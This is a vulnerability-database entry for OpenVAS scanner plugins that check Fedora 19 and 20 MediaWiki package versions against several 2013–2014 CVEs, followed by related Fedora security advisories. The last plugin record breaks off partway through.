ID OPENVAS:1361412562310868401 Type openvas Reporter Copyright (C) 2014 Greenbone Networks GmbH Modified 2019-03-15T00:00:00
Description
Check the version of mediawiki
###############################################################################
# OpenVAS Vulnerability Test
#
# Fedora Update for mediawiki FEDORA-2014-12263
#
# Authors:
# System Generated Check
#
# Copyright:
# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.868401");
script_version("$Revision: 14223 $");
script_tag(name:"last_modification", value:"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $");
script_tag(name:"creation_date", value:"2014-10-15 06:02:42 +0200 (Wed, 15 Oct 2014)");
script_cve_id("CVE-2014-7295", "CVE-2014-2853", "CVE-2014-1610", "CVE-2013-6452",
"CVE-2013-6451", "CVE-2013-6454", "CVE-2013-6453", "CVE-2013-6472");
script_tag(name:"cvss_base", value:"7.5");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_name("Fedora Update for mediawiki FEDORA-2014-12263");
script_tag(name:"summary", value:"Check the version of mediawiki");
script_tag(name:"vuldetect", value:"Checks if a vulnerable version is present on the target host.");
script_tag(name:"affected", value:"mediawiki on Fedora 20");
script_tag(name:"solution", value:"Please install the updated package(s).");
script_tag(name:"qod_type", value:"package");
script_tag(name:"solution_type", value:"VendorFix");
script_xref(name:"FEDORA", value:"2014-12263");
script_xref(name:"URL", value:"https://lists.fedoraproject.org/pipermail/package-announce/2014-October/140740.html");
script_category(ACT_GATHER_INFO);
script_copyright("Copyright (C) 2014 Greenbone Networks GmbH");
script_family("Fedora Local Security Checks");
script_dependencies("gather-package-list.nasl");
script_mandatory_keys("ssh/login/fedora", "ssh/login/rpms", re:"ssh/login/release=FC20");
exit(0);
}
include("revisions-lib.inc");
include("pkg-lib-rpm.inc");
release = rpm_get_ssh_release();
if(!release)
exit(0);
res = "";
if(release == "FC20")
{
if ((res = isrpmvuln(pkg:"mediawiki", rpm:"mediawiki~1.23.5~1.fc20", rls:"FC20")) != NULL)
{
security_message(data:res);
exit(0);
}
if (__pkg_match) exit(99);
exit(0);
}
{"id": "OPENVAS:1361412562310868401", "type": "openvas", "bulletinFamily": "scanner", "title": "Fedora Update for mediawiki FEDORA-2014-12263", "description": "Check the version of mediawiki", "published": "2014-10-15T00:00:00", "modified": "2019-03-15T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868401", "reporter": "Copyright (C) 2014 Greenbone Networks GmbH", "references": ["https://lists.fedoraproject.org/pipermail/package-announce/2014-October/140740.html", "2014-12263"], "cvelist": ["CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2013-6452", "CVE-2013-6454", "CVE-2014-2853", "CVE-2013-6451", "CVE-2014-7295"], "lastseen": "2019-05-29T18:37:21", "viewCount": 4, "enchantments": {"dependencies": {"references": [{"type": "fedora", "idList": ["FEDORA:D3C0160CE2C3", "FEDORA:9392B60CA53E", "FEDORA:03ECD60DC901", "FEDORA:99FA160CBEF5", "FEDORA:312EC6016164", "FEDORA:68E1360D7018", "FEDORA:1CBA822DA4", "FEDORA:74E4B21C4B", "FEDORA:6D086230EA", "FEDORA:BFF2560CE4A3"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310868570", "OPENVAS:1361412562310868575", "OPENVAS:1361412562310867776", "OPENVAS:1361412562310868400", "OPENVAS:1361412562310869260", "OPENVAS:1361412562310868642", "OPENVAS:1361412562310867954", "OPENVAS:1361412562310867951", "OPENVAS:1361412562310867788", "OPENVAS:1361412562310868638"]}, {"type": "cve", "idList": ["CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6472", "CVE-2013-6454", "CVE-2014-1610", "CVE-2014-7295", "CVE-2014-2853"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:31179", "SECURITYVULNS:DOC:30625"]}, {"type": "nessus", "idList": ["MEDIAWIKI_1_19_10.NASL", "FEDORA_2014-12262.NASL", "DEBIAN_DSA-3046.NASL", "FEDORA_2014-12155.NASL", "MEDIAWIKI_1_23_5.NASL", "GENTOO_GLSA-201502-04.NASL", "FEDORA_2014-12263.NASL", "MANDRIVA_MDVSA-2014-057.NASL", "DEBIAN_DSA-2891.NASL", "FEDORA_2014-1745.NASL"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2891-3:4C320", "DEBIAN:DSA-2891-1:05758", "DEBIAN:DSA-3046-1:77CE8", "DEBIAN:DSA-2891-2:4C744"]}, {"type": "gentoo", "idList": ["GLSA-201502-04"]}, {"type": "archlinux", "idList": ["ASA-201410-3"]}, {"type": "zdt", "idList": ["1337DAY-ID-21844", "1337DAY-ID-21922", "1337DAY-ID-21845"]}, {"type": "seebug", "idList": ["SSV:85082", "SSV:61437"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:125040", "PACKETSTORM:125287"]}, {"type": "thn", "idList": ["THN:14D220C3673BA5820F7A055DC2CB7A3A"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:740983D0417678074247C5AE47DBBED6"]}, {"type": "exploitdb", "idList": ["EDB-ID:31767", "EDB-ID:31329"]}, {"type": "dsquare", "idList": ["E-382"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/MEDIAWIKI_THUMB"]}], "modified": "2019-05-29T18:37:21", "rev": 2}, "score": {"value": 6.9, "vector": "NONE", "modified": "2019-05-29T18:37:21", "rev": 2}, "vulnersScore": 6.9}, "pluginID": "1361412562310868401", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-12263\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868401\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-15 06:02:42 +0200 (Wed, 15 Oct 2014)\");\n script_cve_id(\"CVE-2014-7295\", \"CVE-2014-2853\", \"CVE-2014-1610\", \"CVE-2013-6452\",\n \"CVE-2013-6451\", \"CVE-2013-6454\", \"CVE-2013-6453\", \"CVE-2013-6472\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-12263\");\n script_tag(name:\"summary\", value:\"Check the version of mediawiki\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"mediawiki on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-12263\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-October/140740.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.23.5~1.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "naslFamily": "Fedora Local Security Checks"}
{"fedora": [{"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610", "CVE-2014-2853", "CVE-2014-7295"], "description": "MediaWiki is the software used for Wikipedia and the other Wikimedia Foundation websites. Compared to other wikis, it has an excellent range of features and support for high-traffic websites using multiple servers This package supports wiki farms. Read the instructions for creating wiki instances under /usr/share/doc/mediawiki-1.23.8/README.RPM. Remember to remove the config dir after completing the configuration. ", "modified": "2014-12-29T10:05:00", "published": "2014-12-29T10:05:00", "id": "FEDORA:BFF2560CE4A3", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: mediawiki-1.23.8-1.fc19", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610", "CVE-2014-2853", "CVE-2014-7295"], "description": "MediaWiki is the software used for Wikipedia and the other Wikimedia Foundation websites. Compared to other wikis, it has an excellent range of features and support for high-traffic websites using multiple servers This package supports wiki farms. Read the instructions for creating wiki instances under /usr/share/doc/mediawiki/README.RPM. Remember to remove the config dir after completing the configuration. ", "modified": "2014-10-14T04:36:28", "published": "2014-10-14T04:36:28", "id": "FEDORA:68E1360D7018", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: mediawiki-1.23.5-1.fc20", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610", "CVE-2014-2853", "CVE-2014-7295"], "description": "MediaWiki is the software used for Wikipedia and the other Wikimedia Foundation websites. Compared to other wikis, it has an excellent range of features and support for high-traffic websites using multiple servers This package supports wiki farms. Read the instructions for creating wiki instances under /usr/share/doc/mediawiki/README.RPM. Remember to remove the config dir after completing the configuration. ", "modified": "2014-12-12T04:34:24", "published": "2014-12-12T04:34:24", "id": "FEDORA:99FA160CBEF5", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: mediawiki-1.23.7-1.fc20", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610", "CVE-2014-2853", "CVE-2014-7295"], "description": "MediaWiki is the software used for Wikipedia and the other Wikimedia Foundation websites. Compared to other wikis, it has an excellent range of features and support for high-traffic websites using multiple servers This package supports wiki farms. Read the instructions for creating wiki instances under /usr/share/doc/mediawiki/README.RPM. Remember to remove the config dir after completing the configuration. ", "modified": "2015-04-18T09:37:06", "published": "2015-04-18T09:37:06", "id": "FEDORA:312EC6016164", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: mediawiki-1.23.9-1.fc20", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610", "CVE-2014-2853", "CVE-2014-7295"], "description": "MediaWiki is the software used for Wikipedia and the other Wikimedia Foundation websites. Compared to other wikis, it has an excellent range of features and support for high-traffic websites using multiple servers This package supports wiki farms. Read the instructions for creating wiki instances under /usr/share/doc/mediawiki-1.23.7/README.RPM. Remember to remove the config dir after completing the configuration. ", "modified": "2014-12-12T04:24:17", "published": "2014-12-12T04:24:17", "id": "FEDORA:03ECD60DC901", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: mediawiki-1.23.7-1.fc19", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610", "CVE-2014-2853", "CVE-2014-7295"], "description": "MediaWiki is the software used for Wikipedia and the other Wikimedia Foundation websites. Compared to other wikis, it has an excellent range of features and support for high-traffic websites using multiple servers This package supports wiki farms. Read the instructions for creating wiki instances under /usr/share/doc/mediawiki/README.RPM. Remember to remove the config dir after completing the configuration. ", "modified": "2014-12-29T10:04:19", "published": "2014-12-29T10:04:19", "id": "FEDORA:D3C0160CE2C3", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: mediawiki-1.23.8-1.fc20", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610", "CVE-2014-2853", "CVE-2014-7295"], "description": "MediaWiki is the software used for Wikipedia and the other Wikimedia Foundation websites. Compared to other wikis, it has an excellent range of features and support for high-traffic websites using multiple servers This package supports wiki farms. Read the instructions for creating wiki instances under /usr/share/doc/mediawiki-1.23.5/README.RPM. Remember to remove the config dir after completing the configuration. ", "modified": "2014-10-14T04:43:12", "published": "2014-10-14T04:43:12", "id": "FEDORA:9392B60CA53E", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: mediawiki-1.23.5-1.fc19", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610", "CVE-2014-2853"], "description": "MediaWiki is the software used for Wikipedia and the other Wikimedia Foundation websites. Compared to other wikis, it has an excellent range of features and support for high-traffic websites using multiple servers This package supports wiki farms. Read the instructions for creating wiki instances under /usr/share/doc/mediawiki-1.21.9/README.RPM. Remember to remove the config dir after completing the configuration. ", "modified": "2014-05-06T03:34:45", "published": "2014-05-06T03:34:45", "id": "FEDORA:1CBA822DA4", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: mediawiki-1.21.9-1.fc19", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610", "CVE-2014-2853"], "description": "MediaWiki is the software used for Wikipedia and the other Wikimedia Foundation websites. Compared to other wikis, it has an excellent range of features and support for high-traffic websites using multiple servers This package supports wiki farms. Read the instructions for creating wiki instances under /usr/share/doc/mediawiki-1.21.10/README.RPM. Remember to remove the config dir after completing the configuration. ", "modified": "2014-06-10T02:52:13", "published": "2014-06-10T02:52:13", "id": "FEDORA:16DFF2150A", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: mediawiki-1.21.10-1.fc19", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610", "CVE-2014-2853"], "description": "MediaWiki is the software used for Wikipedia and the other Wikimedia Foundation websites. Compared to other wikis, it has an excellent range of features and support for high-traffic websites using multiple servers This package supports wiki farms. Read the instructions for creating wiki instances under /usr/share/doc/mediawiki/README.RPM. Remember to remove the config dir after completing the configuration. ", "modified": "2014-05-06T03:41:21", "published": "2014-05-06T03:41:21", "id": "FEDORA:6D086230EA", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: mediawiki-1.21.9-1.fc20", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2019-05-29T18:37:33", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2013-6452", "CVE-2013-6454", "CVE-2014-2853", "CVE-2013-6451", "CVE-2014-7295"], "description": "Check the version of mediawiki", "modified": "2019-03-15T00:00:00", "published": "2014-12-30T00:00:00", "id": "OPENVAS:1361412562310868642", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868642", "type": "openvas", "title": "Fedora Update for mediawiki FEDORA-2014-17228", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-17228\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868642\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-12-30 05:58:06 +0100 (Tue, 30 Dec 2014)\");\n script_cve_id(\"CVE-2014-7295\", \"CVE-2014-2853\", \"CVE-2014-1610\", \"CVE-2013-6452\",\n \"CVE-2013-6451\", \"CVE-2013-6454\", \"CVE-2013-6453\", \"CVE-2013-6472\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-17228\");\n script_tag(name:\"summary\", value:\"Check the version of mediawiki\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"mediawiki on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2014-17228\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-December/147173.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.23.8~1.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:17", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2013-6452", "CVE-2013-6454", "CVE-2014-2853", "CVE-2013-6451", "CVE-2014-7295"], "description": "Check the version of mediawiki", "modified": "2019-03-15T00:00:00", "published": "2014-12-12T00:00:00", "id": "OPENVAS:1361412562310868570", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868570", "type": "openvas", "title": "Fedora Update for mediawiki FEDORA-2014-16020", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-16020\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868570\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-12-12 06:00:00 +0100 (Fri, 12 Dec 2014)\");\n script_cve_id(\"CVE-2014-7295\", \"CVE-2014-2853\", \"CVE-2014-1610\", \"CVE-2013-6452\",\n \"CVE-2013-6451\", \"CVE-2013-6454\", \"CVE-2013-6453\", \"CVE-2013-6472\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-16020\");\n script_tag(name:\"summary\", value:\"Check the version of mediawiki\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"mediawiki on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2014-16020\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-December/145910.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.23.7~1.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:46", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2013-6452", "CVE-2013-6454", "CVE-2014-2853", "CVE-2013-6451", "CVE-2014-7295"], "description": "Check the version of mediawiki", "modified": "2019-03-15T00:00:00", "published": "2014-12-12T00:00:00", "id": "OPENVAS:1361412562310868575", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868575", "type": "openvas", "title": "Fedora Update for mediawiki FEDORA-2014-16033", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-16033\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868575\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-12-12 06:06:19 +0100 (Fri, 12 Dec 2014)\");\n script_cve_id(\"CVE-2014-7295\", \"CVE-2014-2853\", \"CVE-2014-1610\", \"CVE-2013-6452\",\n \"CVE-2013-6451\", \"CVE-2013-6454\", \"CVE-2013-6453\", \"CVE-2013-6472\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-16033\");\n script_tag(name:\"summary\", value:\"Check the version of mediawiki\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"mediawiki on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2014-16033\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-December/145969.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.23.7~1.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:12", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2013-6452", "CVE-2013-6454", "CVE-2014-2853", "CVE-2013-6451", "CVE-2014-7295"], "description": "Check the version of mediawiki", "modified": "2019-03-15T00:00:00", "published": "2014-12-30T00:00:00", "id": "OPENVAS:1361412562310868638", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868638", "type": "openvas", "title": "Fedora Update for mediawiki FEDORA-2014-17264", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-17264\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868638\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-12-30 05:56:21 +0100 (Tue, 30 Dec 2014)\");\n 